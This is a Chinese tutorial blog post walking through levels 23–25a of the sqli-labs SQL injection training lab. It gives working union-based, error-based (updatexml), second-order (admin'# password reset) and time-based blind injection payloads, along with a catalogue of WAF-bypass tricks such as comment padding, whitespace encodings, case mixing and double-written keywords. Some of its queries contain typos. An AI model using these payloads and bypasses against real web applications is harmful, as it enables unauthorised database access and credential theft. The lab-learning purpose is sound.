sqli-labs通关攻略教程五(less 23~less-25a)

less 23

  1. 首先在phpstudy中打开网站根目录,在第一关的index.php的文件中加入两行代码echo $sql; echo "<br>";第一句意思是将我们构造的sql语句进行输出,第二句意思为换行符,方便我们浏览。在这里插入图片描述
  2. 输入?id=1,查看页面响应在这里插入图片描述
  3. 当我们输入?id=1'--+时,发现未被注释。
    在这里插入图片描述
  4. 查看源码发现#--+均被空格替换在这里插入图片描述

方法1

  1. 我们尝试第一种解决方法,将注释符用;%00代替,其中闭合方式为'
    在这里插入图片描述
  2. 使用order by查询字段数为3在这里插入图片描述
  3. 当我们使用联合查询语句查询时,发现页面回显与1,2,3无关在这里插入图片描述
    这时尝试将id值用不存在的值进行替换,发现回显为我们所需要的。在这里插入图片描述
  4. 接下来依次用前面所学到的查库、查表、查字段、查字段的值的查询语句进行查询

方法2(报错注入)

http://127.0.0.1/sqli-labs-master/Less-23/?id=1' and updatexml(1,concat(0x7e,(database())),1) or '1'='1

在这里插入图片描述
2.
获得表明

http://127.0.0.1/sqli-labs-master/Less-23/?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),1) or '1'='1

在这里插入图片描述

union select 1,2,group_concat(schema_name)from information_schema.schemata;%00  //查库名

union select 1,2,group_concat(table_name)from information_schemata.tables where table_schema=0x+security的十六进制编码;%00  //查字段

union select 1,2,group_concat(column_name)from information_schemata.tables where table_name=0x+users的十六进制编码;%00  //查字段中的值

union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users ;%00

基础知识补充

sql语句定义顺序

(1) SELECT (2)DISTINCT<select_list>
(3) FROM <left_table>
(4) <join_type> JOIN <right_table>
(5) ON <join_condition>
(6) WHERE <where_condition>
(7) GROUP BY <group_by_list>
(8) WITH {CUBE|ROLLUP}
(9) HAVING <having_condition>
(10) ORDER BY <order_by_condition>
(11) LIMIT <limit_number>

sql语句执行顺序

(8) SELECT (9)DISTINCT<select_list>
(1) FROM <left_table>
(3) <join_type> JOIN <right_table>
(2) ON <join_condition>
(4) WHERE <where_condition>
(5) GROUP BY <group_by_list>
(6) WITH {CUBE|ROLLUP}
(7) HAVING <having_condition>
(10) ORDER BY <order_by_list>
(11) LIMIT <limit_number>

基础知识补充——二次注入

二次注入可以理解为,攻击者恶意构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。
也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但在数据库内部调用读取数据时又会被还原。
在这里插入图片描述

less 24

  1. 我首先使用默认账号和密码 admin admin进行登录,进入到修改数据的界面。
  2. 我们先不修改密码,我们退出登录后再注册一个新账号(用于二次注入攻击),用户名为admin'#,登录密码为123
  3. 登录后进行修改密码的操作,账号填admin'#,新密码为123456
  4. 此处修改密码的SQL语句为
UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'

这里的'$curr_pass'是指定账号的当前(正确)密码,$pass是要修改的密码,没有进行过滤。
此时的sql语句变为

UPDATE users SET PASSWORD='123456' where username='admin'#' and password='123'

所以真正执行的是

UPDATE users SET PASSWORD='123456' where username='admin'

基础知识补充-SQL注入WAF绕过

WAF绕过大致可以分为三类:

  1. 白盒绕过
  2. 黑盒绕过
  3. fuzz测试

白盒绕过

通过源代码分析,来进行绕过,类似于代码审计

黑盒绕过

WAFWAF称为web应用防火墙,是通过执行一系列针对HTTP,HTTPS的安全策略,来专门对web应用,提供保护的一款产品。

1. 架构层面绕过waf

  • 寻找源网站绕过waf检测,主要针对的是云waf,找到源网站的真实地址,进行绕过,有点像CDNCDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。】
  • 通过网段绕过waf防护,在同一个网段中,可能经过的数据不会经过云waf,从而实现绕过。

2. 资源限制角度绕过waf

  • 一般waf的执行需要优先考虑业务优先的原则,所以对于构造较大、超大数据包可能不会进行检测,从而实现绕过waf

3. 协议层面绕过waf

  • 协议为覆盖绕过waf,比如由于业务需要,只对get型进行检测,post数据选择忽略。
  • 参数污染,index?id=1&id=2,waf可能只对id=1进行检测

4. 规则层面的绕过

  • sql注释符绕过,例: less23
    (1)union /**/ select,我们将union select之间的空格使用注释符进行替换(适用于union select之间的空格进行检测的情况)
    (2)union/*crow%0%32#**/,我们在注释符中间填充内容在这里插入图片描述

(3)union/*aaaaaaaabbbbbccccdddd%%%%%*/,构造较大数据
(4)/*union select*/内联注释,我们使用内联注释,mysql特有的在这里插入图片描述

  • 空白符绕过
    (1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/
    (2)正则空白符:%09、%0A、%0B、%0D、%20
    25%为百分号,%25A0就是空白符
  • 函数分割符号
1)concat()
(2)  conat%2520(
(3)concat/**/(
(4)concat%250c(
(5)concat%25a0(
  • 浮点数次法解释
    (1)waf对于id=1进行检测,但是对于id=1E0(10的0次方)、id=1.0、id=\N可能就无法检测
  • 利用error-based(报错)进行sql注入
extractvalue(1,concat(0x5c,md5(3)))
updatexml(1,concat(0x5d,md5(3)))
GeometryCollection((select*from(select*from(select@@version)f)x))
polygon((select*from(select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
  • mysql特殊语法
select {x schema_name} from {x information_schema.schemata};
select {x 1};

在这里插入图片描述
在这里插入图片描述

  • 大小写绕过(sql语句中不区分大小写)
    (1)如果对关键字and or union等进行了过滤,可以考虑使用大小写混合的方法
    (2)Or aNd UniOn等进行了过滤,这个时候我们可以考虑使用双写的方法
    在这里插入图片描述

  • 关键字重复
    (1)OOrc->or

  • 关键字替换
    (1)如果还是无法绕过,可以考虑替换的方法。
    (2)and->&&or->|| like可以替换=<>等价于!=在这里插入图片描述

fuzz测试

  • 可以使用burp配合进行手工测试,后期测试成功再用脚本进行处理,如:/**/注释符号中需要多少位字符或者多少位数字可以进行绕过,需要结果burp进行测试。

less 25

  1. 首先在phpstudy中打开网站根目录,在第一关的index.php的文件中加入两行代码echo $sql; echo "<br>";第一句意思是将我们构造的sql语句进行输出,第二句意思为换行符,方便我们浏览。在这里插入图片描述

方法1

  1. 先使用http://127.0.0.1/sqli-labs-master/Less-25/?id=1测试查看结果在这里插入图片描述
  2. 接着加单引号进行测试出现了报错,添加注释符号–+闭合后再查看响应结果,报错消失。http://127.0.0.1/sqli-labs-master/Less-25/?id=1'--+在这里插入图片描述
  3. 查看最下面一行青色的字体,即为我们最终发起的请求的结果。
  4. http://127.0.0.1/sqli-labs-master/Less-25/?id=1' order by 2--+接着使用order by进行查询字段数。在这里插入图片描述
    我们查看响应结果最下面的一行,发现发起的请求的最终结果的or被过滤。
  5. 这时我们查看题目源码在这里插入图片描述其中第一行代码的意思是or不区分大小写,且被replace这个函数替换为空;同理,第二行的意识是and不区分大小写,且被replace这个函数替换为空。
  6. 我们可以尝试上面提到的双写绕过http://127.0.0.1/sqli-labs-master/Less-25/?id=1' OorRder by 2--+,发现得到了我们想要的效果。经过测试,字段数为3。

在这里插入图片描述
8. 接着我们尝试用联合查询的语句http://127.0.0.1/sqli-labs-master/Less-25/?id=1121' union select 1,2,3--+,发现2和3得到了回显。
9.

http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' union select 1,2,group_concat(schema_name) from infOorrmation_schema.schemata--+

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' union select 1,2,group_concat(table_name) from infOorrmation_schema.tables where table_schema=0x7365637572697479--+

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' union select 1,2,group_concat(column_name) from infOorrmation_schema.columns where table_name=0x7573657273--+

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' union select 1,2,group_concat(concat_ws(0x7e,username,passwOorRd))from security.users --+

在这里插入图片描述

方法2

http://127.0.0.1/sqli-labs-master/Less-25/?id=1221'  || '1'='1

在这里插入图片描述
尝试报错注入

http://127.0.0.1/sqli-labs-master/Less-25/?id=1221'  ||  updatexml(1,concat(0x7e,(database())),1) || '1'='1

在这里插入图片描述
database()语句换为我们上面写过的select语句依次将库名、表名、字段、以及字段中的值进行爆破。

less 25a

  1. 首先在phpstudy中打开网站根目录,在第一关的index.php的文件中加入两行代码echo $sql; echo "<br>";第一句意思是将我们构造的sql语句进行输出,第二句意思为换行符,方便我们浏览。在这里插入图片描述

方法1

  1. 打开源码我们发现,与上一关相同,将and和or不区分大小写,且用空格代替在这里插入图片描述
  2. 本关与上一关的区别还有,本关未进行包裹,而上一关使用单引号作为包裹在这里插入图片描述
  3. 其余步骤与上一关相同。

方法2(基于时间的盲注)

?id=-1 oorr if(length(database())>1,1,sleep(5)) --+   //判断数据库长度
?id=-1 oorr if(length(database())>'a',1,sleep(5)) --+  //判断数据库的组成

其余具体步骤参考十三关

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

poggioxay

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值